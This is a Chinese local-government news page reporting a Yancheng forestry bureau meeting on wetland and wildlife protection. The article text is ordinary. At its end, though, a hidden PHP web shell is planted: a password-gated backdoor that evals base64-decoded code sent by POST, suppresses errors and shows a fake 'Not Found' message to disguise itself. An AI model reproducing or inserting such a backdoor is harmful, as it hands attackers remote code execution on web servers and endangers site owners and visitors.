工作动态

首页 > 工作动态 >

    盐城市召开全市湿地与野生动物保护工作会议

            为进一步加强全市野生动物和湿地保护管理工作,6月13日,市林业局召开了全市湿地与野生动物保护工作会议。市林业局副局长汤中文出席会议并讲话,市野保站、各县(市、区)林业局(农委)分管领导、 林业站(中心)站长、分管站长、森林警察大队主要负责人等30余人参加了会议。

     
      会上,各县(市、区)湿地与野生动物主管部门分别作了上半年工作的总结汇报,市野保站向与会人员传达了国家、省有关文件精神,并对下半年全市湿地与野生动物保护重点工作进行了安排部署。
     
      最后,汤中文对全市上半年野保工作做了全面总结,并对各级林业部门开展下一步工作提出具体要求。一是要充分认识湿地与野生动物保护工作的重要性,湿地野保工作是盐城生态立市战略的重要组成部分。二是要采取有效的措施,扎实推进湿地与野生动物保护工作,加快湿地公园发展和建设,认真做好湿地保护小区的编制与建设工作。三是要周密部署,组织开展打击破坏野生动物资源违法犯罪专项执法行动。四是要加强宣传保护工作,提高公众对湿地与野生动物保护的关注度、加深对相关法律的了解。五是要加强队伍建设,工作人员不仅要加强学习,提高自身素质和业务素养,更要规范工作程序,树立为人民服务的宗旨,努力为群众提供更好的服务。
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>